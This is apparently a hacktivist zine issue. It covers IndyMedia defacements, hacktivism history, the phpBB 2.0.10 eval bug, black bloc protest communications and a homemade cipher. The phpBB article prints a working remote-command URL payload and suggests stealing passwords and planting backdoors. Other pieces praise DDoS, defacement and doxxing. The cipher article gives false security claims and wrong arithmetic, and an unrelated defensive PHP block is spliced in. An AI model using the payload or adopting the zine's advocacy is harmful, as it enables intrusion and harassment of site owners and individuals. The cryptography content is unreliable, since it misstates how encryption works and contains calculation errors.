During the Republican National Convention, a group of hackers called RightWingExtremist.net was formed by Brett Chance (elac, clorox, awbOt, etc) from Plano TX. This group came out of the ultra-conservative ProtestWarrior.com, which advocates disrupting and attacking leftist organizations. Their actions had started with minor stuff like launching ddos attacks on NYC IndyMedia. Later they discovered an xss flaw in dadaIMC that allowed them to post news that would automatically redirect users to his own website, where it would play sounds that said childish political rhetoric like 'the nazi indymedia wants to destroy israel', etc. Because of pressure from the online community, Brett from RightWingExtremist.net closed down the site for several months.

Months later, Jeremy from HackThisSite.org discovered a flaw in dadaIMC that allowed the upload of malicious PHP files which could be used to take over the entire server. This announcement was quietly made to dadaIMC, who was urged to keep it private until the tech staff of every indymedia center was notified and had their scripts patched to protect themselves.
Several other independent IndyMedia centers including Chicago (which got patched) and NYC were notified ahead of time. But before the majority of sites were patched, DadaIMC posted the vulnerability information on the website, including instructions on how it can be exploited.

A month later a group calling itself the g00ns.com attacked and defaced a dozen indymedia websites using the vulnerability posted to dadaimc. On the hacked websites, a message calling indymedia 'liars' and 'anti-republicans' was posted. Soon after, hackers and indymedia techs started working together to fix each other's code and bring backups back online as well as expose the g00ns.

Other groups including ProtestWarrior.com, FreeRepublic.com, and KobeHQ.com have resorted to online harassment to discredit and silence progressive views.

The g00ns started out by attacking online gaming clan websites, but moved farther to the right when Elac from RightWingExtremist.net joined up under his new name clorox. When they defaced IndyMedia sites, people started to gather information and infiltrate their organization, and soon after all of their private details were released to the public to show that actions like this will not be tolerated.

Many other right-wing trolls continue to try to disrupt IndyMedia and left-wing protest groups. These individuals operate under several different names including ProtestWarrior.com, RightWingExtremist.net, FreeRepublic.com, KobeHQ.com, FreeDominion.com, LittleGreenFootballs.com, and more. Many of these groups are suspected of being financed operations from governments or corporations similar to the COINTELPRO program from the 60s and 70s. Common activities range from flooding message boards, faking votes and reviews in online polls, releasing personal information of key organizers, spreading false rumors and scandals, etc.
All IndyMedia centers running DadaIMC are strongly encouraged to patch their software, but more importantly, hackers need to work with activist groups around the world to make sure their software is secure, encrypted, and anonymous. Check dadaimc.org or sfactive.org often for security updates.

DirectNIC enforces ICANN WHOIS contact information accuracy

DirectNIC has begun selectively enforcing an obscure rule of ICANN that all contact details in the WHOIS database on the owner of a domain must be accurate. They have sent emails out to owners of domains threatening to delete the domain if the contact details are not corrected and verified. The owner has to fax in proof of their name, home address, phone and fax number. They have threatened to shut down the site if accurate details are not provided in 15 days.

Activists have just launched prole.info, which provides a number of anti-capitalist writings and pamphlets, and sent announcements to a variety of email lists and websites. Two days afterwards, prole.info was threatened: provide accurate details or face having the domain shut down.

This is a gross privacy violation, and it is unfair that it seems to be very loosely and even selectively enforced. Thousands of domains give questionable and fake details, but why was prole.info targeted? Does DirectNIC hire a team of people to randomly browse websites and verify contact details? Was prole.info reported by people who wanted to find out where the activists live?

We do not want to face harassment from ICANN, DirectNIC, or anyone else who takes away our privacy on the net. Put pressure on those who create and enforce these policies that threaten internet free speech.

http://www.prole.info
tech@prole.info

To a valued directNIC customer,

It has come to our attention that one or more of your domain names lists inaccurate information in the WHOIS contact database. To avoid losing your domain(s), please update this information within 15 days.
Here is a list of affected domains:

PROLE.INFO
Errors in Registrant Information: Proles - Haywood, William
Name: INCORRECT
Address: INCORRECT
Phone: INCORRECT
Description: "William Haywood" is a historical figure related to the website's content and not likely a real (modern) person. The address and phone are clearly non-existent.

Why must we do this? Unfortunately, as a domain name registrar, the Internet Corporation for Assigned Names and Numbers (ICANN) has placed the responsibility on us to enforce the governing body's rules, including seeing to it that information provided in WHOIS is up to date and accurate. Failure for Intercosmos to adhere to these rules, after being notified of a potential violation, is grounds for our company's accreditation to be revoked. One major registrar already was threatened with this very action.

Please update your information and fax to us proof of all your contacts for these domains to 504-566-0484. Please send your fax to the Attention of the Abuse Department.

Thanks for your cooperation and for choosing directNIC.

Sincerely,
directNIC Customer Support
support@directnic.com

developed a "theory and artform all in one." It was called Floodnet. Floodnet was developed by "four artist-hacker-activists" under a new group called the "Electronic Disturbance Theatre" (EDT). Stalbaum explained that Floodnet is an "example of conceptual net.art [sic] that empowers people through activist/artistic expression." According to the CAE's website, Internet surfers in support of the "digital resistance" against globalization can simply click on a link, leave the browser open, and the Floodnet Applet will "automatically reload the target web page every few seconds (Stalbaum)."

The CAE first launched their Floodnet tools against websites connected to "Mexican neo-liberalism" in solidarity with the Zapatista resistance. The actions were defined as a "virtual sit-in," which parallels action in the streets.
The Floodnet script deliberately makes an invalid request using keywords such as "human_rights." The targeted server will then respond with "human_rights not found on this server (Stalbaum)." Other hacking groups including the Electrohippies Collective also launched similar floodnet attacks on groups like the World Trade Organization to coincide with major street actions. The ehippies "claimed that the action was successful... with the WTO conference networks being constantly slowed, brought to a complete total halt on two occasions and with 450,000 people participating over five days."

This sort of online direct action is disputed as "hacktivism" by Oxblood Ruffin, a prominent member of the Cult of the Dead Cow. Oxblood claimed in a speech at the CyberCrime and Digital Law Enforcement Conference at Yale Law School that "DoS" (denial of service) attacks (carried out by the CAE, EDT, and ehippies) "smelled like the same cheap hacks were being elevated to political street protests when they weren't more than script kiddy antics in drag." He declared that "digital disobedience or cyber sit-ins" were not synonymous with hacktivism.

Instead Ruffin came up with a modified form of Richard Stallman's GPL known as the "Hacktivismo Enhanced Source Software License Agreement." HESSLA uses the Universal Declaration of Human Rights (UDHR) as the basis of its philosophy. The UDHR was developed in 1948 in the General Assembly of the United Nations to avoid the atrocities committed during World War II. Its main principles are:

The HESSLA license follows the declaration that:

Both Hacktivismo and its end-users to go to court if someone tries to use the software in a malicious manner, or to introduce harmful changes in the software. It also contains more robust language than has previously been used to maximize enforcement against governments around the world.
Any government or institution guilty of human rights violations can be prosecuted if caught using software with this license. Although this license has never debuted in the court systems, it remains a symbolic act of the hacktivist and has sprouted in other scalable and effective forms.

However, many hackers feel that the GPL and HESSLA license do not go far enough in defending the open source movement. Corporations like SCO and Microsoft are actively working together to sue major distributors of Linux. Because of their economic advantage and influence in the court system, they have been successful in bringing charges against the Linux community for allegedly stealing portions of "copyrighted" SCO UNIX source code. Hackers, left with no other voice, have taken matters into their own hands by directly attacking SCO servers. Tactics started out with simple DDOS attacks which shut down servers for periods of time (Wagner) but have evolved into more complex attacks such as website defacements (Barr) and even worms and viruses infecting hundreds of thousands of computers to attack SCO servers (Hines). The actions of SCO have radicalized hackers to take action in more ways than distributing free code.

More aggressive forms of hacktivism have emerged in the Middle East conflict. "There has been a massive increase in online activities, particularly in relation to the conflict in Palestine and Israel (and more recently associated with 9-11), which has been labeled 'e-jihad'," explains Gary Bunt. "E-jihad" is an electronic version of the holy war representing the struggle of good over evil. The "massive increase in online activities" is cyber warfare. It wholly rejects the "digitally correct" philosophy and has taken the hacker ethic of the "hands-on imperative" or "direct action" to its final step.
The Pro-Palestinian hacking group "World's Fantabulous Defacers" (WFD) was responsible for hundreds of web defacements against Israeli, Indian, Taiwanese, Yugoslavic and the online bank Karachi website. Their most notorious attack was against the Israeli Prime Minister Ariel Sharon's election campaign website in 2001. They posted grotesque images of "a badly scarred child whose horrific injuries were the result of his house being 'burned down by illegal Jewish settlers in the West Bank'." They explained their actions as follows:

We are no heroes...but merely hackers...while we understand that it is not feasible for us to successfully make a legitimate difference in oppressed and tortured lives in Palestine... we will continue to deface, not destroy, for the cause...until there is reform...until there is change...until all suffering children in the world can wake up to a world of peace, not a world of death, destruction, and chaos, a world devoid of war. (Bunt)

They included links to the Intifada (translated uprising) Online, Palestinian Information Center, and the Islamic Association for Palestine.

Other Muslim hacking groups have started organizing against Israeli and Indian sites by working with various hacking groups and distributing hacker tools. Their actions range from politically motivated hacks to shout-outs to other affiliated groups. One such Muslim hacking group is called "The Muslim Hacker's Club" (MHC). In addition to distributing viruses and flood tools, Alldas.org "logged 28 hacking attacks linked to the MHC" against commercial Indian sites (Bunt).

Another notorious group was called the "Silverlords." Alldas.org documented 1,436 defacements from November 2000 to April 2002. In their major defacement of paintcompany.com, they "presented a pro-Kashmiri page, with graphic photographs of human rights violations." They quoted, "STOP THE INDIAN GENOCIDE AGAINST THE PEOPLE OF KASHMIR. FREE KASHMIR, PALESTINE. .
.END THE INJUST U.N SANCTIONS ON IRAQ."

The hacking group GFORCE was another accomplished collective. They were known to have hacked the US Defense Test & Evaluation Professional Institute (DTEPI) in September 2000. They replaced the site's content with very strong messages and photos of Palestinian children being killed by the Israeli troops. Their ending statement explains their call for an e-jihad:

"We have suffered throughout the wages and will suffer no more. This is the era of cyberwarfare, where once again the Muslims have prevailed. We will not rest till every node, every line, every bit of information contained in our suppressors has not been wiped out, returning them to the dark ages. We will not tolerate anymore, and we will not fail." (Bunt)

GFORCE also hacked other "US government agencies, military and other targets via Taiwan-based platforms." GFORCE was the most "prominent group of hackers to have emerged from Pakistan (Dr. Nuker, Pakistani Hackerz Club)."

The hacking group UNITY has increased militancy under the potent cyber Islamic ideology - hacking under the "iron guard banner." They advocated penetrating the "enemy's network" and "planting code" to cause direct infrastructure damage in what they perceive as online war. UNITY described their hacking strategy in a systematic format, as follows:

1) Disabling official Israeli government sites.
2) Crashing financial sites.
3) Knocking out main Israeli ISP servers.
4) Blitzing major Israeli e-commerce sites causing transaction loss.

UNITY believes that "the more money they (Israeli cyber fronts) lose in fixing and strengthening their systems means less money to buy bullets and rockets for use against our children." Gilad Rabinovich, CEO of the Israeli ISP Netvision, said, "All Israeli ISPs have been overloaded with data" and confessed that "we are just the only ones to admit it."
In addition to being "overloaded with data," the CEO continues that if the cyber war were to continue "it will steal resources from us and hurt customers. (Gambill)"

In order to be effective, it is imperative that all aspects of hacktivism are embraced: promoting free decentralized information networks as well as taking direct action against those responsible for violating digital and human rights. The materialization of a free society requires the systematic destruction of oppressive forces working against the free flow of information. The internet is not free; it is made free by those who are willing to fight to protect it.

Beyond Physical Borders: Hacking and Activism on the Net
by fetus

The combination of activism, the Internet and hacking is hacktivism; its abstract can be partially defined in the "hacker ethic," as described in Steven Levy's Hackers:

1) Access to computers - and anything which might teach you something about the way the world works - should be unlimited and total. Always yield to the Hands-On Imperative!
2) All information should be free.
3) Mistrust Authority - Promote Decentralization
4) Hackers should be judged by their hacking, not bogus criteria such as degrees, age, race or religion.
5) You can create art and beauty on a computer.

Free information, although described by Levy as an ethic, is more precisely a core value that the hacker ethic achieves. It demands uncompromised availability. However, there are forces opposing its existence. Companies and governments are threatened and have responded to hackers by attacking networks of free communication as they progress toward the free information movement. Hacktivism is the active struggle to materialize free societies as described by the hacker ethic.

The concept of unlimited computer access for the sake of learning (the first hacker ethic) is manifested by a variety of organizations. Such examples are free software, education, music and free network availability.
These collectives naturally adhere to the fundamental belief that all information should be free (the second hacker ethic).

The free software movement has its roots with Richard Stallman. He developed GNU, which stands for "Gnu's Not Unix." GNU is a model for software developers to release their code free from the threat of privatization. This is done under the General Public License, or the GPL. According to the website, the GPL is constructed to assure that software developers "have the freedom to distribute copies of free software, receive source code, and change the software or use pieces of it in new programs." The GPL assures that this is accomplished by specifically stating:

1) Changes to existing free software must be made known to its recipient that it was modified.
2) All software released under the GPL "must be licensed for everyone's free use or not licensed at all."

The successes of the open source movement have inspired programmers to release their code under the GPL. For example, sourceforge.net provides an opportunity for people to release their projects (which currently number 99,572) freely.

Other institutions have adapted the open source GPL model. The online free encyclopedia Wikipedia encourages people to contribute and edit its contents, implementing democratic methods such as page history and discussion.

Universities are also contributing to the open source movement by releasing all course materials and lectures free of charge. For example, the Open Course Ware project at MIT has set a new standard for higher education. Charles Vest, President of MIT, explained in the annual report that:

"The computer industry learned the hard way that closed software systems - based on a framework of proprietary knowledge - did not fit the world they themselves had created. The organic world of open software and open systems was the true wave of the future. Higher education must learn from this.
We must create open knowledge systems as the new framework for teaching and learning."

Although these institutions have taken the initiative to spread the benefits of open source, giant corporations (and governments alike) are vehemently fighting its development. A major milestone case is SCO vs. IBM. Stephen Shankland, staff writer of CNET News.com, reported that SCO, the "inheritor of the intellectual property for the Unix operating system has sued IBM for more than $1 billion." Chris Sontag, Senior Vice President of SCO, claimed that IBM "has contaminated their Linux work with inappropriate knowledge from Unix." However, SCO does not stand unsupported in this legal battle. Microsoft, a multibillion-dollar software corporation and an advocate of proprietary source code, had been financially backing SCO's legal defense. In another article, Stephen Shankland reported that Microsoft gave a total of $16.6 million to SCO "for a Unix license, according to regulatory filings." Corporations like Microsoft and SCO are using their economic superiority to undermine the free-software movement because it threatens their profit in the industry.

Corporations are not the only entity working against the free information evolution. The U.S. Department of State, in a release made by the Bureau of Democracy, admits that the Chinese government:

Continued to suppress political, religious and social groups, as well as individuals, that it perceived to be a threat to regime power or national stability. The Government's human rights record remained poor, and the Government continued to commit numerous and serious abuses. It refused to allow social, political or religious groups to organize or act independently of the Government and the Communist Party. Those who tried to act independently were often harassed, detained or abused by the authorities.

Nick Mathiason, a writer for the Observer, reported that Microsoft sold technology used to censor the Internet to the Chinese government.
It has "resulted in the jailing of its political opponents." Mathiason continues to explain that Amnesty International "has cited Microsoft for helping fuel 'a dramatic rise in the number of people detained or sentenced for internet-related offences'."

In its press release, Microsoft declared that it signed an agreement with the Chinese authorities to "provide national governments with controlled access to Microsoft and Windows source code." The agreement, called the "Government Security Program," is "tailored to the specialized security requirements of governments" that permit them to control information in an "appropriate way." In addition to "controlled access," the GSP agreement allows the participating government to "undertake research projects in the field of information security." This means that the Chinese government can spy on (and punish) its people using Microsoft products. Microsoft has profited from the deprivation of First Amendment rights of the Chinese people.

Hackers have declared an inherent mistrust of authority figures because of the repressive actions of large corporations and governments. The hacking community has responded by innovating tools to counter cyber oppression and bypass censorship. Hackers and activists are working together to apply civil disobedience tactics on the internet. The "Hands-On Imperative" is re-appropriated as "direct action," which generates activity liberating the people and at the same time challenging the law.

Hackers have been able to overcome censorship by creating decentralized content distribution networks. These networks remain anonymous and secure because they require all users in the network to share data in small parts. Many programs have emerged such as "peekabooty," "six/four" and "Freenet." According to sourceforge.net, a website that fosters the open source community, "Freenet is free software designed to ensure true freedom of communication over the internet.
It allows anybody to publish and read information with complete anonymity."

In addition to developing technology to defend freedom on the Internet, hackers have staged attacks against those responsible for oppression. Tim Jordan insightfully states, "The rise of hacktivism has not superseded or destroyed previous hacker politics, but has reconfigured it within a broader political landscape" (2002). The Critical Art Ensemble (CAE) was established in 1994, arguing that the onset of the Internet will create a space in which physical laws become an ineffective means of enforcement. The CAE states, "Elite power, having rid itself of its national and urban bases to wander in absence on the electronic pathways, can no longer be disrupted by strategies predicated upon the contestation of sedentary forces" (Jordan 2004). Groups like the CAE are timing online protests to coincide with street actions. The power now lies in computer networks. It is in the form of "Electronic Civil Disobedience (ECD)." The "nomadic" power of the corporation must be fought against on the Internet. The CAE believes that:

"The expertise hackers develop in the technologies of cyberspace can offset the imbalance of power that activists are seeking to redress. ECD magnifies its effects not by increasing the numbers of bodies involved in protests... but by using the expertise of hackers to increase their political effects." (Jordan 2005)

Within two years of the CAE's call for the politicization of hackers, they

Nmap Developers Intimidated by the FBI
by Wyrmkill

Fyodor, the creator of the Nmap port scanner, says he is being pressured by the Federal Bureau of Investigation for copies of the logs of the Web server that hosts his Web site, Insecure.org. Nmap is an open source tool designed to help security experts scan networks, services and applications. Federal agents are trying to intimidate hackers who download and use these tools, no matter what they do with them.

Fyodor made this announcement in his blog: "FBI agents from all over the country have contacted me demanding Web server log data from Insecure.org. They don't give me reasons, but they generally seem to be investigating a specific attacker whom they think may have visited the Nmap page at a certain time. So far, I have never given them anything. In some cases, they asked too late and data had already been purged through our data retention policy. In other cases, they failed to serve the subpoena properly. Sometimes they try asking without a subpoena and give up when I demand one."

It is not a new tactic for law enforcement to use intimidation and pressure to convince hackers to give in - but without a search warrant or a proper subpoena, you are not required to answer questions or give anything to them. Stand up for your digital rights!

http://www.insecure.org/nmap

PhpBB 2.0.10 Disclosure Causes Mischief + Mayhem on Net

In use by millions of websites all over the internet, PhpBB is one of the most popular message board systems. You can imagine the mayhem that ensued when a major vulnerability was discovered late November that allowed the execution of commands on all major versions prior to 2.0.10. Many users might remember Jessica Soules as a developer for Hack This Site. No one expected that her release of the bug to Bugtraq would result in such an explosion, causing several major worms that killed tens of thousands of websites and blessing script kiddies with easy-to-use tools to take down a server.

The vulnerability lies in viewtopic.php, which does not correctly validate the user-supplied 'highlight' variable as it is passed to PHP's eval() command. You can break out of their command and issue your own PHP commands, including the system() command, allowing remote execution of commands. You could craft a URL similar to /viewtopic.php?t=2&highlight=%2527%252esystem(chr(108)%252echr(115))%252e%2527, which would execute 'ls', giving you a directory listing.

This exploit opens the machine up for you to play with the permissions of whatever the web server is running as. From here you could perform a wide range of actions, from grabbing password information from config files to installing backdoors or just simply fucking up their forums. The box is essentially yours to play with, and it shouldn't be difficult to find ways of gaining higher permissions to take over the machine entirely.

It wasn't long before someone wrote a perl script to search Google for vulnerable targets to attack and spread itself to. The Santy (or NeverEverNoSanity) worm ran at least 20 generations and killed an estimated 40,000 websites before Google disabled the search queries that allowed the worm to spread. Several modifications of the worm changed search engines and queries slightly, which allowed it to spread once again. The payload of the worm was to wipe all files and replace them with the text, "This website has been defaced!!!". For such a cleverly written worm, the author didn't have a whole lot to say, and caused a whole lot of random destruction and ruined things for hackers who wanted to use the phpbb bug for more legitimate purposes.

The release of this major bug has had some massive implications. In the future, we advise against disclosing such vulnerabilities because of the potential side effects of script kiddies or destructive worms. Since Jess released it to Bugtraq, she has been under constant harassment from PhpBB, her hosting provider, and other groups who have been personally affected by the PhpBB hack. In finding such a devastating security hole in such a major piece of software, Jessica will go down in history.
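A defensive counterpart to the 'highlight' bug described above, as an added example that is neither phpBB's code nor its actual patch: search-term highlighting that treats the request value strictly as data, decoded once by PHP, escaped with preg_quote(), and never passed to eval(). The function name highlight_terms and the sample post are assumptions; the second sample value is the one from the URL quoted in the article, as it arrives after PHP's single decoding.

```php
<?php
// Added example, not phpBB's code: highlight search terms without ever
// evaluating user input. Names and sample data are assumptions.

/**
 * Return $text as HTML with every search term wrapped in <b class="hl">.
 *
 * $text         plain (non-HTML) post text
 * $rawHighlight the value exactly as PHP hands it over in $_GET, which is
 *               already URL-decoded once
 */
function highlight_terms(string $text, string $rawHighlight): string
{
    $flags = ENT_QUOTES | ENT_SUBSTITUTE;

    // No second urldecode() here: a value sent as %2527 arrives as %27, and
    // decoding it again would produce a quote after any earlier filtering.
    $terms = preg_split('/\s+/', trim($rawHighlight), -1, PREG_SPLIT_NO_EMPTY);
    if ($terms === false) {
        $terms = [];
    }

    $patterns = [];
    foreach (array_slice($terms, 0, 10) as $term) {   // bound the work per request
        if (strlen($term) <= 64) {
            // preg_quote() escapes regex metacharacters and the delimiter,
            // so a term can only ever match literally.
            $patterns[] = preg_quote($term, '/');
        }
    }
    if ($patterns === []) {
        return htmlspecialchars($text, $flags, 'UTF-8');
    }

    // Split the text on the terms and keep the matches: with one capture
    // group, odd indexes of the result are the matched terms.
    $regex = '/(' . implode('|', $patterns) . ')/i';
    $parts = preg_split($regex, $text, -1, PREG_SPLIT_DELIM_CAPTURE);
    if ($parts === false) {
        return htmlspecialchars($text, $flags, 'UTF-8');
    }

    $html = '';
    foreach ($parts as $i => $part) {
        // Every piece is HTML-escaped; markup is added only by this code.
        $safe = htmlspecialchars($part, $flags, 'UTF-8');
        $html .= ($i % 2 === 1) ? '<b class="hl">' . $safe . '</b>' : $safe;
    }
    return $html;
}

// Constructed sample post and highlight values.
$post = 'Use ls -la to list files; <script> tags in posts are escaped too.';
$samples = [
    'ls files',                                   // ordinary search terms
    '%27%2esystem(chr(108)%2echr(115))%2e%27',    // value from the article's URL, decoded once
    '(.*) <script>',                              // regex and HTML metacharacters
];

foreach ($samples as $value) {
    echo "highlight = $value\n";
    echo '  ' . highlight_terms($post, $value) . "\n";
}
```

With this approach the article's value is just a literal string that matches nothing in the post, so the post is printed escaped and unchanged.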
[Code listing not recoverable from the scan: a PHP script whose header comment reads "Mac OS X password hash thief!", uses a /usr/bin/at vulnerability, and is credited to HackThisSite.]
Arm Yourself!

Communication and Information Gathering During a Protest
by alxCIAda

Where the black bloc goes the cops will not be far off. The cops almost always have an advantage over us with their expensive radios, 'less than lethal' weapons, all the intimidating riot gear you can dream of, and in most big cities enough troops to seriously outnumber the members of the bloc. One of the things that must be done to improve our effectiveness as a street fighting force and pose a bigger threat to the powers of the state is to work on our communication and information gathering skills prior to and during an action.

Pre-Action Recon

Having scouts at an event is a very important thing to consider. Scouts should be out patrolling at an event well before it starts. The cops are out well before daylight setting up for the action and so should we. Scouts should travel in groups of 2-3, never alone; this will lower the risk of them being picked up. Such recon groups might want to use bicycles to increase their mobility. Some things recon teams should look out for are possible police staging areas, which are commonly multi-story parking complexes, and materials that could be used in the construction of barricades and road blocks. Also take note of cameras, dead ends, and possible routes to use if you need to escape; most importantly, make sure you won't get lost. If you're not from the area a map will come in handy.

If your maps include information on the day's action you must encrypt them. The importance of this cannot be stressed enough. If the police were to get a hold of a map without it being encrypted the entire day's action could be spoiled. In fact it happened during the R2k action in Philadelphia when cops got a hold of two people leaving a black bloc meeting. They had copies on them of maps of the day's action, which the cops discovered upon searching them. These maps were unencrypted and included the location of black bloc emergency gathering sites, as well as the areas that they were going to focus their activities on, and the location of supplies to be used in the creation of road blocks. With the cops knowing all this information, you can imagine what kind of damage it did to the day's plans.

Another tactic you might want to use is to divide the locals up, so instead of working as a local contingent they can be treated as specialists and divided up between groups to share their knowledge of the area. This way they can help more people learn the land and, if it comes to it, escape without being arrested.

Police Scanning

One thing all groups involved in the day's action should have is a police scanner; they can provide much needed information about police movements and tactics. Before you go out to battle cops with your police scanner there are some things you should know. A very important subject you must look into is your local laws dealing with police scanning. In the USA it is legal to use a police scanner in your own home; it's when you hit the streets that their use might become illegal. In some places like California, New Jersey, and Vermont you cannot use the device in furtherance of a crime, which depending on the day's action could be pinned onto those using one in a bloc. In some of the other states possession of such devices is illegal for anyone without a permit. For a list of state laws dealing with police scanning go to: afn.org/~afn09444/scanlaws/scanner5.html

Another thing you must do if you plan on using a police scanner during the day's action is look up the codes your local PD uses; try and remember as many as you can. Most importantly you must be able to recognize a code that would be used to describe the activities that are planned throughout the day's action. A good way to get the codes down is to use your scanner when you're not under the pressure of police oppression. If it seems as though they are talking too fast for you to get everything they are saying, just write down the bits and pieces that you do get, and if you don't know what the codes they are using mean, look them up. You should be familiar with the way the radio operators are used to talking. No radio operator will ever talk using familiar conversation on the radio; they will use badge #s, police codes, and a phonetic alphabet. You should be able to understand what the officers are saying when they use a phonetic alphabet. The phonetic alphabet is used by communicators all over to clarify letters and spellings. When listening to the cops they will spell out people's names, DOB, license plates, and pretty much everything else you can think of using a phonetic alphabet. A copy of the phonetic alphabet can be found at: hackbloc.org/alxciada/phonetic.txt

It's very important that you be discreet when using a scanner. It can easily make people think you are a cop or some kind of undercover officer not worthy of their trust. A good idea would be to keep it hidden and run a pair of headphones to it like a Walkman; this will also allow you to hear it a lot better as it can get pretty loud on the streets. MAKE SURE the cops do not see the scanner, for the persons with the scanner will have an important role of helping move the bloc away from trouble and keeping the group updated on the police movements. If the cops identify you as someone important or taking a role such as this they will try to single you out and arrest you.

When the action starts the radio will be going off like crazy. In most cases a breakaway march away from a larger contingent catches the officers off guard. A common tactic of the police is to trap this group on a smaller side street, circle them and make arrests. The person with the police scanner has to be aware of this and watch out for this being set up. Also listen to reports of people being arrested; get their names, DOB, and any info that you think can help their legal situation. It helps to have a notepad and a pen/pencil to write down info such as this. Make sure if you're staying with the group that you keep on top of where the front of the group is and where the back is; the cops will announce this every few blocks. This is important to make sure that one part isn't falling behind the others and to keep us as a tighter group.

[Image: text message from TextAlerts (8.31.04 7:21PM): "police planning on penning in all protesters at harald square and arresting: only exits though the south..."]
[Image text: "The bloc has broken" "The Police are retreating!"]

Other Communication Techniques

Walkie-talkies should only be used if no other means of communication are available. Walkie-talkies can be monitored very easily, so all important messages should be encrypted. Things that relate to your tactics and positions should always be said using a code and if possible spread through other means besides radio. You do not need to encrypt everything; these radios can be used to spread messages like calling for a medic, telling the group to stick together, or that the police are attacking. Things like this that are not critical to your goal or that could hurt your bloc do not need to be encrypted and should be spread to as many people as possible to get the help you need. All those who plan on using a radio should have a one-time-use nickname that will conceal their identity when using the radio. Same goes for the code: you should change your code as often as possible. Obviously the downside of this is that the new code has to be taught to everyone again, but it will improve your chances of keeping your communications secret. Another good trick is to send false info over the radio: say you're going after one target while actually going to another. Make it seem like a slip up; maybe one member will announce a fake target and another will come on the air saying that this is not secure and no more talk about the target should be discussed. Maybe even send a small group in that direction as a distraction. This could allow you to catch the police off guard; if the cops are listening in, it could buy you the time you need to make it to your real target unnoticed.

One idea that has been very effective in spreading tactical information is setting up a tactical short message system (SMS) mailing list to send e-mail updates to the cell phones of trusted members of the bloc. This is a little more technical than the other methods of communication discussed so far but it has worked very well at the Republican National Convention and the Democratic National Convention to spread tactical information to the different groups. Almost all cell phones have an e-mail address to which you can send short text messages. This can be used to update your fellow freedom fighters with information dealing with police movements, or as an alternative to using 2 way walkie-talkies. Your phone's e-mail address will be your 10 digit phone number @ an address based on your provider. For example, for Verizon cell phones it will be [10 digit phone number]@vtext.com. If you don't know what your phone's e-mail address is, here is a short list of common providers.

AT&T - @mobile.att.net
Cingular - @mobile.mycingular.com
Nextel - @messaging.nextel.com
Sprint - @messaging.sprintpcs.com
T-Mobile - @tmomail.net
Verizon - @vtext.com

The idea would be to have a mailing list where one user can send a message to an address which in turn would send it to all the members of the bloc who are registered on this list. This is the same idea behind services such as http://www.txtmod.com where you can register groups to send SMS messages to. TxtMob was set up to provide an easy way to set up SMS message groups of protestors for the RNC and the DNC. All the user had to do was set up a user account and follow a few steps and they had their mailing list set up.

If you are part of a really large bloc you can set up a cluster mailing list where each affinity group could have their own mailing list, say group1@mailinglist.net group2@mailinglist.net group3@mailinglist.net... Those addresses will be registered on another mailing list, say bloc@mailinglist.net, so that messages that only concern a certain group can stay within the group while larger messages that affect everyone can be sent to the entire bloc using bloc@mailinglist.net.

If you change your mailing list address often and verify all those on the list, the chance of police intercepting your tactical information is largely reduced. The downside is of course that the amount of time it takes to type and send a message using a cell phone might not be available when you're smashing the state; that's why other forms of communication should still be used.

This article only touches the surface of how we can improve our communication and information gathering skills; tips discussed in this article are just the beginning. To pose a real threat to the powers of the state we must spend more of our time training for upcoming actions. Our enemies take training very seriously and so should we. We should start training people to use a wide range of equipment and skills. Not only those discussed in this article but whatever you can think of to keep our tactics new and creative. The more random our tactics seem the less the police can prepare to counter them. This way, next time we meet the cops in battle, they won't know what hit them.
The Art of the Cipherer: Putting Imagination Back into Cryptography
by Psyche

Cryptography is the term given to the study of encryption, or making data secret by hiding its meaning in layers of alteration.

Great, but why should I bother reading this? I can use an encryption program...

There are a great many well known ways of encryption. To name a few: the Caesar Shift, the Enigma code, MD4, MD5, Xor and many more. There are also a lot of programs tailored to cracking these methods, thereby making these forms of encryption less and less secure.

Great! Get the point please! I'm a busy person!

Thus, there is not an encryption more secure than one you have devised yourself; nobody else knows how it works so there is no program to decrypt it. This article has a brief guide to creating your own cipher in four easy steps.

Stage 1: Lost in Encryption

Firstly we need a string to encrypt:

PURPLE CARS ARE MORE FUN

The first step in cipher creation is devising a way of hiding your data; there are three main schools of doing this.

Substitution - Replacing the letters in a string with other letters, numbers, symbols etc.
Shift - Altering the position of a letter in a string, or shifting the letter along the alphabet or ASCII table.
Rail - Changing the presentation of the string to make it harder to comprehend.

I am going to implement a simple substitution, replacing each letter in the string with the one directly preceding it in the alphabet, making our string:

PURPLE CARS ARE MORE FUN
otqokd bzqr zqd lnqd etm

Where the letter A is in the string it has been counted around again in the alphabet, making the new letter Z. So, we can mathematically display our cipher as X-1, where X is a letter in our string. This however is horrendously insecure, and can easily be decrypted by anyone with an understanding of cryptography. So, we need to add something to make it harder.
Stage 2: Variables

For those who are unfamiliar with the workings of algorithm based cryptography a brief synopsis is as such: X*N*K, X being the numerical value of the letter or word to be encrypted, N being any given number and K being the key. The key is a number which can be constantly changed to alter how the string is encrypted. In algorithm encryptions the key forms the variable. The shortcoming of such algorithm based encryptions is that they can eventually be solved by any number crunching program.

Variables are just what they sound like, something that can be altered in the cipher to alter the outcome. Variables can be easily changed to protect integrity and foil any decrypting attempts.

For this example I will be implementing a variable as follows: 7x, where X is the numerical value of a letter (I could make this a lot more difficult, however I want a cipher that can be fairly easily decrypted, by me anyway). Thus making the cipher without the variable added:

otqokdbzqrzqdlnqdetm
15 20 16 15 11 4 2 24 17 18 24 17 4 12 14 17 4 5 20 13

And with the variable added:

105 100 119 105 77 28 14 168 119 126 168 119 28 84 98 28 35 100 91

However this is still in essence substitution and can be fairly easily cracked. The main benefit is that it has a basis for alteration at a moment's notice.

Stage 3: Constants

Adding a constant has one big advantage: it stops any letter/number/symbol from being repeated, which helps protect it from frequency based attacks. I will be using square numbers as my constant, adding them to the front of the numbers.

1105 4100 9119 25105 2677 4928 6414 81168 100119 121126 144268 169119 19628 22584 25698 289119 32435 361100 40091

Stage 4: Calculated Chaos

This final step is to throw off any attempts to break the cipher by adding a condition to the previous steps. This simply makes finding the cipher harder; it is best used in an IF situation. IF (whatever)=true then do whatever.
So, I intend to alter the last stage so that if the number in the encrypted string is a prime number, the square number is added to the rear of the text, not the front. Thus, making our cipher (after checks but before revisions):

(Just a wee note, 1 isn't a prime number, contrary to popular belief)

1051 1004 1199 25105 3677 4928 1464 81168 100119 121126 268144 169119 28196 22584 25698 289119 35324 361100 91400

See, wasn't that easy?

Final section: The Importance of Nothing

It seems to be a mindset of people to assume that numbers in an algebraic equation will be integers of 1 or more or -1 or less, not 0. I find that adding 0 (when it's replaced by something) will confuse any human led attacks, but not computer ones.

So, there you have it. A brief introduction into the construction of a cipher. This is only an outline and I strongly encourage deviation; if you wish to know more, there are a number of good books and sites out there, and of course www.hackthissite.org.

